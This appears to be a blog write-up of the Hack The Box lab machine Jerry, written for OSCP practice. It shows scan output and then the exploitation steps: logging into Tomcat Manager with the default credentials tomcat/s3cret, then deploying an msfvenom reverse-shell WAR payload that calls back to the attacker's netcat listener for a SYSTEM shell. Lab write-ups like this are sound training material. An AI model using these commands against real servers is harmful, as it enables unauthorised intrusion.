Hack The Box: Jerry Write-up (#39)

This is my 39th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomater 10.10.10.95 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

Running all scans on 10.10.10.95Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up (0.013s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 6.06 seconds
---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up.
All 1000 scanned ports on 10.10.10.95 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.50 seconds---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:16 +08
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.01s elapsed
Initiating SYN Stealth Scan at 21:16
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
Warning: 10.10.10.95 giving up on port because retransmission cap hit (1).
SYN Stealth Scan Timing: About 11.78% done; ETC: 21:20 (0:03:52 remaining)
SYN Stealth Scan Timing: About 23.20% done; ETC: 21:20 (0:03:22 remaining)
SYN Stealth Scan Timing: About 34.63% done; ETC: 21:20 (0:02:52 remaining)
SYN Stealth Scan Timing: About 46.06% done; ETC: 21:20 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.48% done; ETC: 21:20 (0:01:52 remaining)
SYN Stealth Scan Timing: About 67.89% done; ETC: 21:20 (0:01:26 remaining)
SYN Stealth Scan Timing: About 80.34% done; ETC: 21:20 (0:00:52 remaining)
Completed SYN Stealth Scan at 21:20, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up (0.0093s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.80 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 206 (9.064KB)
No new ports---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:20 +08
Nmap scan report for 10.10.10.95
Host is up (0.0086s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:20 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.95
Host is up (0.063s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.92 seconds
---------------------Recon Recommendations----------------------Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 -o recon/gobuster_10.10.10.95_8080.txt
nikto -host 10.10.10.95:8080 | tee recon/nikto_10.10.10.95_8080.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:---------------------Running Recon Commands----------------------Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.95:8080
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 21:22:50 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs (Status: 302) [Size: 0]
http://10.10.10.95:8080/examples (Status: 302) [Size: 0]
http://10.10.10.95:8080/favicon.ico (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/lpt1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/nul (Status: 200) [Size: 0]
http://10.10.10.95:8080/prn (Status: 200) [Size: 0]
===============================================================
2020/09/12 21:23:10 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2020-09-12 21:23:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7970 requests: 3 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-09-12 21:42:40 (GMT8) (1170 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================

---------------------Finished all Nmap scans---------------------

Only port 8080 is open.

  • Port 8080: — Running HTTP service, Apache-Coyote/1.1

Before we begin, let’s make mental notes based on the scan results.

  1. The only open port is port 80. Surely this will be our entry point to the target. A quick Google search for “Apache Coyote” reveals that is a Connector component for Tomcat that supports the HTTP 1.1 protocol as a web server. Nikto scan results discovered that tomcat manager using the default credentials tomcat/s3cret. The path to the tomcat manager we can get it from the Gobuster scan results which is /manager. For your information, this is default tomcat manager path. Apache Tomcat by design allows you to run code, so we can simply deploy a war file that sends a reverse shell back to our attack machine. Since we have enough information we can directly jump into the exploitation phase.

Exploitation

Visit the /manager.

Key in the discovered default credentials tomcat/s3cret.

We are authenticated.

Next, generate MSFvenom payload.

msfvenom -p java/jsp_shell_reverse_tcp -f war lhost=10.10.14.31 lport=53 -o shell.war

Upload the shell.war payload.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 53

Visit the shell payload from browser

http://10.10.10.95:8080/shell/

or click the shell folder in the manager.

Then go back the listener to see if get a shell.

We are SYSTEM! We don’t even require to escalate privilege. Seems like apache tomcat service have been running with SYSTEM privilege. Grab the user and root flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Conceal.

--

--

--

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Using AAD PODIdentity with Azure Kubernetes Service

Implement a Successful DevOps Roadmap Today

Simple CTF

Security : Http Session vs JWT

But that was the whole problem with sugar dating sites. I couldn’t believe anything I was told.

Setup Minio Server on Centos 7 and Proxy Pass Using Nginx

Common Errors Found in Kubernetes Manifests

Clean Architecture with ent and gqlgen

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

More from Medium

TryHackMe-Metasploit: Exploitation

picoCTF: Wireshark doo dooo do doo…

TryHackMe Gallery Writeup

TryHackMe: [Day 19] Blue Teaming Something Phishy Is Going On